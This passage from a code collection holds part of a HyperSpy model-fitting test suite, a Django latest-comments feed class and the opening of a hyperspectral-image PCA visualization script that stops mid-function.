    attribute namespace, and snapping of out-of-bounds parameter values.

    Fix: the class previously defined ``test_components_class_change_name_del_default``
    twice; the second definition silently shadowed the first, so the first
    test never ran. The second occurrence is renamed
    ``test_components_class_change_invalid_name_del_default`` so both run.
    """

    def setUp(self):
        s = hs.signals.Spectrum(np.empty(1))
        m = s.create_model()
        self.model = m

    def test_errfunc(self):
        # _errfunc = y - model (optionally weighted).
        m = self.model
        m._model_function = mock.MagicMock()
        m._model_function.return_value = 3.
        np.testing.assert_equal(m._errfunc(None, 1., None), 2.)
        np.testing.assert_equal(m._errfunc(None, 1., 0.3), 0.6)

    def test_errfunc2(self):
        # _errfunc2 = sum of squared (weighted) residuals per channel.
        m = self.model
        m._model_function = mock.MagicMock()
        m._model_function.return_value = 3. * np.ones(2)
        np.testing.assert_equal(m._errfunc2(None, np.ones(2), None), 2 * 4.)
        np.testing.assert_equal(m._errfunc2(None, np.ones(2), 0.3), 2 * 0.36)

    def test_gradient_ls(self):
        m = self.model
        m._errfunc = mock.MagicMock()
        m._errfunc.return_value = 0.1
        m._jacobian = mock.MagicMock()
        m._jacobian.return_value = np.ones((1, 2)) * 7.
        np.testing.assert_equal(m._gradient_ls(None, None), 2 * 0.1 * 7 * 2)

    def test_gradient_ml(self):
        m = self.model
        m._model_function = mock.MagicMock()
        m._model_function.return_value = 3. * np.ones(2)
        m._jacobian = mock.MagicMock()
        m._jacobian.return_value = np.ones((1, 2)) * 7.
        np.testing.assert_equal(
            m._gradient_ml(None, 1.2), -2 * 7 * (1.2 / 3 - 1))

    def test_model_function(self):
        # _model_function must both evaluate and store the trial parameters.
        m = self.model
        m.append(hs.model.components.Gaussian())
        m[0].A.value = 1.3
        m[0].centre.value = 0.003
        m[0].sigma.value = 0.1
        param = (100, 0.1, 0.2)
        np.testing.assert_array_almost_equal(176.03266338,
                                             m._model_function(param))
        nt.assert_equal(m[0].A.value, 100)
        nt.assert_equal(m[0].centre.value, 0.1)
        nt.assert_equal(m[0].sigma.value, 0.2)

    @nt.raises(ValueError)
    def test_append_existing_component(self):
        g = hs.model.components.Gaussian()
        m = self.model
        m.append(g)
        m.append(g)

    def test_append_component(self):
        g = hs.model.components.Gaussian()
        m = self.model
        m.append(g)
        nt.assert_in(g, m)
        nt.assert_is(g.model, m)
        nt.assert_is(g._axes_manager, m.axes_manager)
        nt.assert_true(all([hasattr(p, 'map') for p in g.parameters]))

    def test_calculating_convolution_axis(self):
        m = self.model
        # setup
        m.axis.offset = 10
        m.axis.size = 10
        ll_axis = mock.MagicMock()
        ll_axis.size = 7
        ll_axis.value2index.return_value = 3
        m._low_loss = mock.MagicMock()
        m.low_loss.axes_manager.signal_axes = [ll_axis, ]
        # calculation
        m.set_convolution_axis()
        # tests: the convolution axis is extended by the low-loss extent.
        np.testing.assert_array_equal(m.convolution_axis, np.arange(7, 23))
        np.testing.assert_equal(ll_axis.value2index.call_args[0][0], 0)

    def test_access_component_by_name(self):
        m = self.model
        g1 = hs.model.components.Gaussian()
        g2 = hs.model.components.Gaussian()
        g2.name = "test"
        m.extend((g1, g2))
        nt.assert_is(m["test"], g2)

    def test_access_component_by_index(self):
        m = self.model
        g1 = hs.model.components.Gaussian()
        g2 = hs.model.components.Gaussian()
        g2.name = "test"
        m.extend((g1, g2))
        nt.assert_is(m[1], g2)

    def test_component_name_when_append(self):
        # Duplicate default names are disambiguated with _0, _1 suffixes.
        m = self.model
        gs = [
            hs.model.components.Gaussian(),
            hs.model.components.Gaussian(),
            hs.model.components.Gaussian()]
        m.extend(gs)
        nt.assert_is(m['Gaussian'], gs[0])
        nt.assert_is(m['Gaussian_0'], gs[1])
        nt.assert_is(m['Gaussian_1'], gs[2])

    @nt.raises(ValueError)
    def test_several_component_with_same_name(self):
        m = self.model
        gs = [
            hs.model.components.Gaussian(),
            hs.model.components.Gaussian(),
            hs.model.components.Gaussian()]
        m.extend(gs)
        # Force a name collision bypassing the public setter.
        m[0]._name = "hs.model.components.Gaussian"
        m[1]._name = "hs.model.components.Gaussian"
        m[2]._name = "hs.model.components.Gaussian"
        m['Gaussian']

    @nt.raises(ValueError)
    def test_no_component_with_that_name(self):
        m = self.model
        m['Voigt']

    @nt.raises(ValueError)
    def test_component_already_in_model(self):
        m = self.model
        g1 = hs.model.components.Gaussian()
        m.extend((g1, g1))

    def test_remove_component(self):
        m = self.model
        g1 = hs.model.components.Gaussian()
        m.append(g1)
        m.remove(g1)
        nt.assert_equal(len(m), 0)

    def test_remove_component_by_index(self):
        m = self.model
        g1 = hs.model.components.Gaussian()
        m.append(g1)
        m.remove(0)
        nt.assert_equal(len(m), 0)

    def test_remove_component_by_name(self):
        m = self.model
        g1 = hs.model.components.Gaussian()
        m.append(g1)
        m.remove(g1.name)
        nt.assert_equal(len(m), 0)

    def test_delete_component_by_index(self):
        m = self.model
        g1 = hs.model.components.Gaussian()
        m.append(g1)
        del m[0]
        nt.assert_not_in(g1, m)

    def test_delete_component_by_name(self):
        m = self.model
        g1 = hs.model.components.Gaussian()
        m.append(g1)
        del m[g1.name]
        nt.assert_not_in(g1, m)

    def test_delete_slice(self):
        m = self.model
        g1 = hs.model.components.Gaussian()
        g2 = hs.model.components.Gaussian()
        g3 = hs.model.components.Gaussian()
        m.extend([g1, g2, g3])
        del m[:2]
        nt.assert_not_in(g1, m)
        nt.assert_not_in(g2, m)
        nt.assert_in(g3, m)

    def test_get_component_by_name(self):
        m = self.model
        g1 = hs.model.components.Gaussian()
        g2 = hs.model.components.Gaussian()
        g2.name = "test"
        m.extend((g1, g2))
        nt.assert_is(m._get_component("test"), g2)

    def test_get_component_by_index(self):
        m = self.model
        g1 = hs.model.components.Gaussian()
        g2 = hs.model.components.Gaussian()
        g2.name = "test"
        m.extend((g1, g2))
        nt.assert_is(m._get_component(1), g2)

    def test_get_component_by_component(self):
        m = self.model
        g1 = hs.model.components.Gaussian()
        g2 = hs.model.components.Gaussian()
        g2.name = "test"
        m.extend((g1, g2))
        nt.assert_is(m._get_component(g2), g2)

    @nt.raises(ValueError)
    def test_get_component_wrong(self):
        m = self.model
        g1 = hs.model.components.Gaussian()
        g2 = hs.model.components.Gaussian()
        g2.name = "test"
        m.extend((g1, g2))
        m._get_component(1.2)

    def test_components_class_default(self):
        m = self.model
        g1 = hs.model.components.Gaussian()
        m.append(g1)
        nt.assert_is(getattr(m.components, g1.name), g1)

    def test_components_class_change_name(self):
        m = self.model
        g1 = hs.model.components.Gaussian()
        m.append(g1)
        g1.name = "test"
        nt.assert_is(getattr(m.components, g1.name), g1)

    @nt.raises(AttributeError)
    def test_components_class_change_name_del_default(self):
        # After renaming, the old default attribute must be gone.
        m = self.model
        g1 = hs.model.components.Gaussian()
        m.append(g1)
        g1.name = "test"
        getattr(m.components, "Gaussian")

    def test_components_class_change_invalid_name(self):
        m = self.model
        g1 = hs.model.components.Gaussian()
        m.append(g1)
        g1.name = "1, Test This!"
        nt.assert_is(
            getattr(m.components,
                    slugify(g1.name, valid_variable_name=True)), g1)

    @nt.raises(AttributeError)
    def test_components_class_change_invalid_name_del_default(self):
        # Renamed from a duplicate test_components_class_change_name_del_default:
        # the duplicate shadowed the method above so it never executed.
        m = self.model
        g1 = hs.model.components.Gaussian()
        m.append(g1)
        invalid_name = "1, Test This!"
        g1.name = invalid_name
        g1.name = "test"
        getattr(m.components, slugify(invalid_name))

    def test_snap_parameter_bounds(self):
        m = self.model
        g1 = hs.model.components.Gaussian()
        m.append(g1)
        g2 = hs.model.components.Gaussian()
        m.append(g2)
        g3 = hs.model.components.Gaussian()
        m.append(g3)
        g4 = hs.model.components.Gaussian()
        m.append(g4)

        g1.A.value = 3.
        g1.centre.bmin = 300.
        g1.centre.value = 1.
        g1.sigma.bmax = 15.
        g1.sigma.value = 30

        g2.A.value = 1
        g2.A.bmin = 0.
        g2.A.bmax = 3.
        g2.centre.value = 0
        g2.centre.bmin = 1
        g2.centre.bmax = 3.
        g2.sigma.value = 4
        g2.sigma.bmin = 1
        g2.sigma.bmax = 3.

        # g3 parameters are not free / component checks below: fixed
        # parameters must NOT be snapped.
        g3.A.bmin = 0
        g3.A.value = -3
        g3.A.free = False
        g3.centre.value = 15
        g3.centre.bmax = 10
        g3.centre.free = False
        g3.sigma.value = 1
        g3.sigma.bmin = 0
        g3.sigma.bmax = 0

        # Inactive components must NOT be snapped either.
        g4.active = False
        g4.A.value = 300
        g4.A.bmin = 500
        g4.centre.value = 0
        g4.centre.bmax = -1
        g4.sigma.value = 1
        g4.sigma.bmin = 10

        m.ensure_parameters_in_bounds()
        np.testing.assert_almost_equal(g1.A.value, 3.)
        np.testing.assert_almost_equal(g2.A.value, 1.)
        np.testing.assert_almost_equal(g3.A.value, -3.)
        np.testing.assert_almost_equal(g4.A.value, 300.)
        np.testing.assert_almost_equal(g1.centre.value, 300.)
        np.testing.assert_almost_equal(g2.centre.value, 1.)
        np.testing.assert_almost_equal(g3.centre.value, 15.)
        np.testing.assert_almost_equal(g4.centre.value, 0)
        np.testing.assert_almost_equal(g1.sigma.value, 15.)
        np.testing.assert_almost_equal(g2.sigma.value, 3.)
        np.testing.assert_almost_equal(g3.sigma.value, 0.)
        np.testing.assert_almost_equal(g4.sigma.value, 1)
class TestModel2D:

    """End-to-end fit of a 2D Gaussian image model."""

    def setUp(self):
        # Synthesize a noiseless Gaussian image centred at (-5, -5).
        g = hs.model.components.Gaussian2D(
            centre_x=-5.,
            centre_y=-5.,
            sigma_x=1.,
            sigma_y=2.)

        x = np.arange(-10, 10, 0.01)
        y = np.arange(-10, 10, 0.01)
        X, Y = np.meshgrid(x, y)
        im = hs.signals.Image(g.function(X, Y))
        im.axes_manager[0].scale = 0.01
        im.axes_manager[0].offset = -10
        im.axes_manager[1].scale = 0.01
        im.axes_manager[1].offset = -10
        self.im = im

    def test_fitting(self):
        im = self.im
        m = im.create_model()
        # Start deliberately off the true values; the fit must recover them.
        gt = hs.model.components.Gaussian2D(centre_x=-4.5,
                                            centre_y=-4.5,
                                            sigma_x=0.5,
                                            sigma_y=1.5)
        m.append(gt)
        m.fit()
        np.testing.assert_almost_equal(gt.centre_x.value, -5.)
        np.testing.assert_almost_equal(gt.centre_y.value, -5.)
        np.testing.assert_almost_equal(gt.sigma_x.value, 1.)
        np.testing.assert_almost_equal(gt.sigma_y.value, 2.)
class TestModelFitBinned:

    """Fits of a Gaussian to a seeded random histogram with every optimizer.

    Expected values are tied to np.random.seed(1) and the exact order of the
    setUp statements; do not reorder.
    """

    def setUp(self):
        np.random.seed(1)
        s = hs.signals.Spectrum(
            np.random.normal(
                scale=2,
                size=10000)).get_histogram()
        s.metadata.Signal.binned = True
        g = hs.model.components.Gaussian()
        m = s.create_model()
        m.append(g)
        g.sigma.value = 1
        g.centre.value = 0.5
        g.A.value = 1e3
        self.m = m

    def test_fit_fmin_leastsq(self):
        self.m.fit(fitter="fmin", method="ls")
        np.testing.assert_almost_equal(self.m[0].A.value, 9976.14519369)
        np.testing.assert_almost_equal(self.m[0].centre.value, -0.110610743285)
        np.testing.assert_almost_equal(self.m[0].sigma.value, 1.98380705455)

    def test_fit_fmin_ml(self):
        self.m.fit(fitter="fmin", method="ml")
        np.testing.assert_almost_equal(self.m[0].A.value, 10001.39613936,
                                       decimal=3)
        np.testing.assert_almost_equal(self.m[0].centre.value, -0.104151206314,
                                       decimal=6)
        np.testing.assert_almost_equal(self.m[0].sigma.value, 2.00053642434)

    def test_fit_leastsq(self):
        self.m.fit(fitter="leastsq")
        np.testing.assert_almost_equal(self.m[0].A.value, 9976.14526082, 1)
        np.testing.assert_almost_equal(self.m[0].centre.value, -0.110610727064)
        np.testing.assert_almost_equal(self.m[0].sigma.value, 1.98380707571, 5)

    def test_fit_mpfit(self):
        self.m.fit(fitter="mpfit")
        np.testing.assert_almost_equal(self.m[0].A.value, 9976.14526286, 5)
        np.testing.assert_almost_equal(self.m[0].centre.value, -0.110610718444)
        np.testing.assert_almost_equal(self.m[0].sigma.value, 1.98380707614)

    def test_fit_odr(self):
        self.m.fit(fitter="odr")
        np.testing.assert_almost_equal(self.m[0].A.value, 9976.14531979, 3)
        np.testing.assert_almost_equal(self.m[0].centre.value, -0.110610724054)
        np.testing.assert_almost_equal(self.m[0].sigma.value, 1.98380709939)

    def test_fit_leastsq_grad(self):
        # grad=True uses the analytical Jacobian; results must match no-grad.
        self.m.fit(fitter="leastsq", grad=True)
        np.testing.assert_almost_equal(self.m[0].A.value, 9976.14526084)
        np.testing.assert_almost_equal(self.m[0].centre.value, -0.11061073306)
        np.testing.assert_almost_equal(self.m[0].sigma.value, 1.98380707552)

    def test_fit_mpfit_grad(self):
        self.m.fit(fitter="mpfit", grad=True)
        np.testing.assert_almost_equal(self.m[0].A.value, 9976.14526084)
        np.testing.assert_almost_equal(self.m[0].centre.value, -0.11061073306)
        np.testing.assert_almost_equal(self.m[0].sigma.value, 1.98380707552)

    def test_fit_odr_grad(self):
        self.m.fit(fitter="odr", grad=True)
        np.testing.assert_almost_equal(self.m[0].A.value, 9976.14531979, 3)
        np.testing.assert_almost_equal(self.m[0].centre.value, -0.110610724054)
        np.testing.assert_almost_equal(self.m[0].sigma.value, 1.98380709939)

    def test_fit_bounded(self):
        # Lower bound above the optimum: centre must land exactly on bmin.
        self.m[0].centre.bmin = 0.5
        # self.m[0].bounded = True
        self.m.fit(fitter="mpfit", bounded=True)
        np.testing.assert_almost_equal(self.m[0].A.value, 9991.65422046, 4)
        np.testing.assert_almost_equal(self.m[0].centre.value, 0.5)
        np.testing.assert_almost_equal(self.m[0].sigma.value, 2.08398236966)

    def test_fit_bounded_bad_starting_values(self):
        # Starting value below bmin must be snapped before fitting.
        self.m[0].centre.bmin = 0.5
        self.m[0].centre.value = -1
        # self.m[0].bounded = True
        self.m.fit(fitter="mpfit", bounded=True)
        np.testing.assert_almost_equal(self.m[0].A.value, 9991.65422046, 4)
        np.testing.assert_almost_equal(self.m[0].centre.value, 0.5)
        np.testing.assert_almost_equal(self.m[0].sigma.value, 2.08398236966)

    @nt.raises(ValueError)
    def test_wrong_method(self):
        self.m.fit(method="dummy")
class TestModelWeighted:

    """Weighted (variance-aware) polynomial fits, binned and unbinned.

    Expected coefficients depend on np.random.seed(1) and the exact setUp
    order; do not reorder statements.
    """

    def setUp(self):
        np.random.seed(1)
        s = hs.signals.SpectrumSimulation(np.arange(10, 100, 0.1))
        # Per-channel variance drives the fit weights.
        s.metadata.set_item("Signal.Noise_properties.variance",
                            hs.signals.Spectrum(np.arange(10, 100, 0.01)))
        s.axes_manager[0].scale = 0.1
        s.axes_manager[0].offset = 10
        s.add_poissonian_noise()
        m = s.create_model()
        m.append(hs.model.components.Polynomial(1))
        self.m = m

    def test_fit_leastsq_binned(self):
        self.m.signal.metadata.Signal.binned = True
        self.m.fit(fitter="leastsq", method="ls")
        for result, expected in zip(self.m[0].coefficients.value,
                                    (9.9165596693502778, 1.6628238107916631)):
            np.testing.assert_almost_equal(result, expected, decimal=5)

    def test_fit_odr_binned(self):
        self.m.signal.metadata.Signal.binned = True
        self.m.fit(fitter="odr", method="ls")
        for result, expected in zip(self.m[0].coefficients.value,
                                    (9.9165596548961972, 1.6628247412317521)):
            np.testing.assert_almost_equal(result, expected, decimal=5)

    def test_fit_mpfit_binned(self):
        self.m.signal.metadata.Signal.binned = True
        self.m.fit(fitter="mpfit", method="ls")
        for result, expected in zip(self.m[0].coefficients.value,
                                    (9.9165596607108739, 1.6628243846485873)):
            np.testing.assert_almost_equal(result, expected, decimal=5)

    def test_fit_fmin_binned(self):
        self.m.signal.metadata.Signal.binned = True
        self.m.fit(
            fitter="fmin",
            method="ls",
        )
        for result, expected in zip(self.m[0].coefficients.value,
                                    (9.9137288425667442, 1.8446013472266145)):
            np.testing.assert_almost_equal(result, expected, decimal=5)

    def test_fit_leastsq_unbinned(self):
        # Unbinned results are the binned ones scaled by the 0.1 axis step.
        self.m.signal.metadata.Signal.binned = False
        self.m.fit(fitter="leastsq", method="ls")
        for result, expected in zip(
                self.m[0].coefficients.value,
                (0.99165596391487121, 0.16628254242532492)):
            np.testing.assert_almost_equal(result, expected, decimal=5)

    def test_fit_odr_unbinned(self):
        self.m.signal.metadata.Signal.binned = False
        self.m.fit(fitter="odr", method="ls")
        for result, expected in zip(
                self.m[0].coefficients.value,
                (0.99165596548961943, 0.16628247412317315)):
            np.testing.assert_almost_equal(result, expected, decimal=5)

    def test_fit_mpfit_unbinned(self):
        self.m.signal.metadata.Signal.binned = False
        self.m.fit(fitter="mpfit", method="ls")
        for result, expected in zip(
                self.m[0].coefficients.value,
                (0.99165596295068958, 0.16628257462820528)):
            np.testing.assert_almost_equal(result, expected, decimal=5)

    def test_fit_fmin_unbinned(self):
        self.m.signal.metadata.Signal.binned = False
        self.m.fit(
            fitter="fmin",
            method="ls",
        )
        for result, expected in zip(
                self.m[0].coefficients.value,
                (0.99136169230026261, 0.18483060534056939)):
            np.testing.assert_almost_equal(result, expected, decimal=5)

    def test_chisq(self):
        self.m.signal.metadata.Signal.binned = True
        self.m.fit(fitter="leastsq", method="ls")
        np.testing.assert_almost_equal(self.m.chisq.data, 3029.16949561)

    def test_red_chisq(self):
        self.m.fit(fitter="leastsq", method="ls")
        np.testing.assert_almost_equal(self.m.red_chisq.data, 3.37700055)
class TestModelScalarVariance:

    """Chi-squared with a scalar noise variance.

    With variance = std**2 the (reduced) chi-squared must be independent of
    the noise amplitude, which is why std=1 and std=10 share expectations.
    Values depend on np.random.seed(1).
    """

    def setUp(self):
        s = hs.signals.SpectrumSimulation(np.ones(100))
        m = s.create_model()
        m.append(hs.model.components.Offset())
        self.s = s
        self.m = m

    def test_std1_chisq(self):
        std = 1
        np.random.seed(1)
        self.s.add_gaussian_noise(std)
        self.s.metadata.set_item("Signal.Noise_properties.variance", std ** 2)
        self.m.fit(fitter="leastsq", method="ls")
        np.testing.assert_almost_equal(self.m.chisq.data, 78.35015229)

    def test_std10_chisq(self):
        std = 10
        np.random.seed(1)
        self.s.add_gaussian_noise(std)
        self.s.metadata.set_item("Signal.Noise_properties.variance", std ** 2)
        self.m.fit(fitter="leastsq", method="ls")
        np.testing.assert_almost_equal(self.m.chisq.data, 78.35015229)

    def test_std1_red_chisq(self):
        std = 1
        np.random.seed(1)
        self.s.add_gaussian_noise(std)
        self.s.metadata.set_item("Signal.Noise_properties.variance", std ** 2)
        self.m.fit(fitter="leastsq", method="ls")
        np.testing.assert_almost_equal(self.m.red_chisq.data, 0.79949135)

    def test_std10_red_chisq(self):
        std = 10
        np.random.seed(1)
        self.s.add_gaussian_noise(std)
        self.s.metadata.set_item("Signal.Noise_properties.variance", std ** 2)
        self.m.fit(fitter="leastsq", method="ls")
        np.testing.assert_almost_equal(self.m.red_chisq.data, 0.79949135)

    def test_std1_red_chisq_in_range(self):
        # Restricting the signal range changes the degrees of freedom.
        std = 1
        self.m.set_signal_range(10, 50)
        np.random.seed(1)
        self.s.add_gaussian_noise(std)
        self.s.metadata.set_item("Signal.Noise_properties.variance", std ** 2)
        self.m.fit(fitter="leastsq", method="ls")
        np.testing.assert_almost_equal(self.m.red_chisq.data, 0.86206965)
class TestModelSignalVariance:

    """Reduced chi-squared with a per-channel (signal) variance over a 2x100
    navigation stack. Values depend on np.random.seed(1) and the noise order
    (Gaussian first, then Poissonian); do not reorder.
    """

    def setUp(self):
        variance = hs.signals.SpectrumSimulation(
            np.arange(
                100, 300).reshape(
                (2, 100)))
        s = variance.deepcopy()
        np.random.seed(1)
        std = 10
        s.add_gaussian_noise(std)
        s.add_poissonian_noise()
        # Total variance = signal variance + Gaussian noise variance.
        s.metadata.set_item("Signal.Noise_properties.variance",
                            variance + std ** 2)
        m = s.create_model()
        m.append(hs.model.components.Polynomial(order=1))
        self.s = s
        self.m = m

    def test_std1_red_chisq(self):
        self.m.multifit(fitter="leastsq", method="ls", show_progressbar=None)
        np.testing.assert_almost_equal(self.m.red_chisq.data[0],
                                       0.79693355673230915)
        np.testing.assert_almost_equal(self.m.red_chisq.data[1],
                                       0.91453032901427167)
class TestMultifit:

    """Behaviour of multifit() when fetching stored parameter values across
    navigation indices, with and without ``fetch_only_fixed``."""

    def setUp(self):
        # Two identical power-law spectra: data = 2 * x ** (-3).
        s = hs.signals.Spectrum(np.zeros((2, 200)))
        s.axes_manager[-1].offset = 1
        s.data[:] = 2 * s.axes_manager[-1].axis ** (-3)
        m = s.create_model()
        m.append(hs.model.components.PowerLaw())
        # Store (A=2, r=2) at index 0 and (A=2, r=100) at index 1; r=100 is
        # deliberately far from the true exponent 3.
        m[0].A.value = 2
        m[0].r.value = 2
        m.store_current_values()
        m.axes_manager.indices = (1,)
        m[0].r.value = 100
        m[0].A.value = 2
        m.store_current_values()
        m[0].A.free = False
        self.m = m
        m.axes_manager.indices = (0,)
        m[0].A.value = 100

    def test_fetch_only_fixed_false(self):
        # All stored values are fetched before fitting each index, so the
        # stored r=100 at index 1 is used (and kept) there.
        self.m.multifit(fetch_only_fixed=False, show_progressbar=None)
        np.testing.assert_array_almost_equal(self.m[0].r.map['values'],
                                             [3., 100.])
        np.testing.assert_array_almost_equal(self.m[0].A.map['values'],
                                             [2., 2.])

    def test_fetch_only_fixed_true(self):
        # Only the fixed parameter (A) is fetched; r is fitted freely and
        # converges to the true exponent 3 at both indices.
        self.m.multifit(fetch_only_fixed=True, show_progressbar=None)
        np.testing.assert_array_almost_equal(self.m[0].r.map['values'],
                                             [3., 3.])
        np.testing.assert_array_almost_equal(self.m[0].A.map['values'],
                                             [2., 2.])

    def test_bounded_snapping(self):
        # After doubling the data the true A is 4; starting below bmin=3 the
        # bounded mpfit fit must still reach A=4 at both indices.
        m = self.m
        m[0].A.free = True
        m.signal.data *= 2.
        m[0].A.value = 2.
        m[0].A.bmin = 3.
        m.multifit(fitter='mpfit', bounded=True, show_progressbar=None)
        np.testing.assert_array_almost_equal(self.m[0].r.map['values'],
                                             [3., 3.])
        np.testing.assert_array_almost_equal(self.m[0].A.map['values'],
                                             [4., 4.])
class TestStoreCurrentValues:

    """store_current_values() records parameter values in the parameter map
    only for active components."""

    def setUp(self):
        self.m = hs.signals.Spectrum(np.arange(10)).create_model()
        self.o = hs.model.components.Offset()
        self.m.append(self.o)

    def test_active(self):
        self.o.offset.value = 2
        self.o.offset.std = 3
        self.m.store_current_values()
        nt.assert_equal(self.o.offset.map["values"][0], 2)
        nt.assert_equal(self.o.offset.map["is_set"][0], True)

    def test_not_active(self):
        # Values of an inactive component must not be written to the map.
        self.o.active = False
        self.o.offset.value = 2
        self.o.offset.std = 3
        self.m.store_current_values()
        nt.assert_not_equal(self.o.offset.map["values"][0], 2)
class TestSetCurrentValuesTo:

    """assign_current_values_to_all() broadcasts the current parameter
    values over the whole navigation space."""

    def setUp(self):
        self.m = hs.signals.Spectrum(
            np.arange(10).reshape(2, 5)).create_model()
        self.comps = [
            hs.model.components.Offset(),
            hs.model.components.Offset()]
        self.m.extend(self.comps)

    def test_set_all(self):
        # With no component list, every component is broadcast.
        for c in self.comps:
            c.offset.value = 2
        self.m.assign_current_values_to_all()
        nt.assert_true((self.comps[0].offset.map["values"] == 2).all())
        nt.assert_true((self.comps[1].offset.map["values"] == 2).all())

    def test_set_1(self):
        # Only the explicitly listed component is updated.
        self.comps[1].offset.value = 2
        self.m.assign_current_values_to_all([self.comps[1]])
        nt.assert_true((self.comps[0].offset.map["values"] != 2).all())
        nt.assert_true((self.comps[1].offset.map["values"] == 2).all())
class TestAsSignal:

    """as_signal() rendering with component selection and per-index
    (multidimensional) component activation."""

    def setUp(self):
        self.m = hs.signals.Spectrum(
            np.arange(10).reshape(2, 5)).create_model()
        self.comps = [
            hs.model.components.Offset(),
            hs.model.components.Offset()]
        self.m.extend(self.comps)
        # Both offsets are 2 everywhere, so the full model evaluates to 4.
        for c in self.comps:
            c.offset.value = 2
        self.m.assign_current_values_to_all()

    def test_all_components_simple(self):
        s = self.m.as_signal(show_progressbar=None)
        nt.assert_true(np.all(s.data == 4.))

    def test_one_component_simple(self):
        s = self.m.as_signal(component_list=[0], show_progressbar=None)
        nt.assert_true(np.all(s.data == 2.))
        # Restricting component_list must not deactivate other components.
        nt.assert_true(self.m[1].active)

    def test_all_components_multidim(self):
        self.m[0].active_is_multidimensional = True
        s = self.m.as_signal(show_progressbar=None)
        nt.assert_true(np.all(s.data == 4.))
        # Deactivate component 0 at navigation index 0 only: that row drops
        # to 2 while the other stays at 4.
        self.m[0]._active_array[0] = False
        s = self.m.as_signal(show_progressbar=None)
        np.testing.assert_array_equal(
            s.data, np.array([np.ones(5) * 2, np.ones(5) * 4]))
        nt.assert_true(self.m[0].active_is_multidimensional)

    def test_one_component_multidim(self):
        self.m[0].active_is_multidimensional = True
        s = self.m.as_signal(component_list=[0], show_progressbar=None)
        nt.assert_true(np.all(s.data == 2.))
        nt.assert_true(self.m[1].active)
        nt.assert_false(self.m[1].active_is_multidimensional)
        s = self.m.as_signal(component_list=[1], show_progressbar=None)
        np.testing.assert_equal(s.data, 2.)
        # Rendering must not reset the multidimensional-active flag.
        nt.assert_true(self.m[0].active_is_multidimensional)
        self.m[0]._active_array[0] = False
        s = self.m.as_signal(component_list=[1], show_progressbar=None)
        nt.assert_true(np.all(s.data == 2.))
        # Component 0 is inactive at index 0, so that row renders as zeros.
        s = self.m.as_signal(component_list=[0], show_progressbar=None)
        np.testing.assert_array_equal(s.data,
                                      np.array([np.zeros(5), np.ones(5) * 2]))
class TestCreateModel:

    """create_model() returns the model class that matches the signal
    dimensionality (1D spectrum vs 2D image)."""

    def setUp(self):
        self.s = hs.signals.Spectrum(np.asarray([0, ]))
        self.im = hs.signals.Image(np.ones([1, 1, ]))

    def test_create_model(self):
        from hyperspy.models.model1D import Model1D
        from hyperspy.models.model2D import Model2D
        nt.assert_is_instance(
            self.s.create_model(), Model1D)
        nt.assert_is_instance(
            self.im.create_model(), Model2D)
class TestAdjustPosition:

    """Lifecycle of the interactive position-adjustment widgets stored in
    ``model._position_widgets`` (one entry per component)."""

    def setUp(self):
        self.s = hs.signals.Spectrum(np.random.rand(10, 10, 20))
        self.m = self.s.create_model()

    def test_enable_adjust_position(self):
        self.m.append(hs.model.components.Gaussian())
        self.m.enable_adjust_position()
        nt.assert_equal(len(self.m._position_widgets), 1)
        # Check that both line and label was added
        nt.assert_equal(len(list(self.m._position_widgets.values())[0]), 2)

    def test_disable_adjust_position(self):
        self.m.append(hs.model.components.Gaussian())
        self.m.enable_adjust_position()
        self.m.disable_adjust_position()
        nt.assert_equal(len(self.m._position_widgets), 0)

    def test_enable_all(self):
        # Components appended after enabling also get widgets.
        self.m.append(hs.model.components.Gaussian())
        self.m.enable_adjust_position()
        self.m.append(hs.model.components.Gaussian())
        nt.assert_equal(len(self.m._position_widgets), 2)

    def test_enable_all_zero_start(self):
        # Enabling with no components yet still tracks later additions.
        self.m.enable_adjust_position()
        self.m.append(hs.model.components.Gaussian())
        nt.assert_equal(len(self.m._position_widgets), 1)

    def test_manual_close(self):
        self.m.append(hs.model.components.Gaussian())
        self.m.append(hs.model.components.Gaussian())
        self.m.enable_adjust_position()
        # Closing one of a component's two widgets leaves the other behind.
        list(self.m._position_widgets.values())[0][0].close()
        nt.assert_equal(len(self.m._position_widgets), 2)
        nt.assert_equal(len(list(self.m._position_widgets.values())[0]), 1)
        # Closing a component's last widget removes its entry entirely.
        list(self.m._position_widgets.values())[0][0].close()
        nt.assert_equal(len(self.m._position_widgets), 1)
        nt.assert_equal(len(list(self.m._position_widgets.values())[0]), 2)
        self.m.disable_adjust_position()
        nt.assert_equal(len(self.m._position_widgets), 0)
| gpl-3.0 |
hasadna/django | django/contrib/comments/feeds.py | 223 | 1037 | from django.contrib.syndication.views import Feed
from django.contrib.sites.models import get_current_site
from django.contrib import comments
from django.utils.translation import ugettext as _
class LatestCommentFeed(Feed):
    """Feed of latest comments on the current site."""

    def __call__(self, request, *args, **kwargs):
        # Resolve the active site once per request so the callback methods
        # below can all refer to it.
        self.site = get_current_site(request)
        return super(LatestCommentFeed, self).__call__(request, *args, **kwargs)

    def title(self):
        return _("%(site_name)s comments") % {"site_name": self.site.name}

    def link(self):
        return "http://%s/" % self.site.domain

    def description(self):
        return _("Latest comments on %(site_name)s") % {"site_name": self.site.name}

    def items(self):
        # The 40 most recent public, non-removed comments for this site.
        visible = comments.get_model().objects.filter(
            site__pk=self.site.pk,
            is_public=True,
            is_removed=False,
        )
        return visible.order_by('-submit_date')[:40]

    def item_pubdate(self, item):
        return item.submit_date
| bsd-3-clause |
shanwai1234/Maize_Phenotype_Map | hyperspectral_PCA_visualization.py | 1 | 7348 | import numpy as np
import cv2
from matplotlib import pyplot as plt
import os
import sys
from scipy import linalg as LA
from matplotlib import cm
##############################Hyperspectral Image PCA Visualization#####################################################################################################################
##############################Notice: Since all pixels were analyzed at once, more Images to be analyzed, expotential time will be cost !!!#############################################
# Copy any PlantID folder you are interested to 'test_HYP'
# Root folder containing the per-plant image directories (CLI argument 1).
mfold = sys.argv[1]
# Create function PCA2 to generate first three PC coefficents for all analyzed image data
def PCA2(data, dims_rescaled_data=3):
    """
    Project *data* onto its leading principal components.

    Parameters
    ----------
    data : 2D numpy array, shape (n_samples, n_features)
        Input matrix.  The array is no longer modified in place
        (previously it was destructively mean-centered, which also
        failed for integer input).
    dims_rescaled_data : int
        Number of principal components to keep.  Defaults to 3, matching
        the RGB visualization performed downstream.

    Returns
    -------
    tuple of (projected, evals, evecs)
        ``projected`` : (n_samples, dims_rescaled_data) component scores,
        ``evals`` : all eigenvalues in decreasing order,
        ``evecs`` : (n_features, dims_rescaled_data) leading eigenvectors.
    """
    # Mean-center a copy so the caller's array is left untouched.
    data = data - data.mean(axis=0)
    # Covariance across features; 'eigh' rather than 'eig' is valid (and
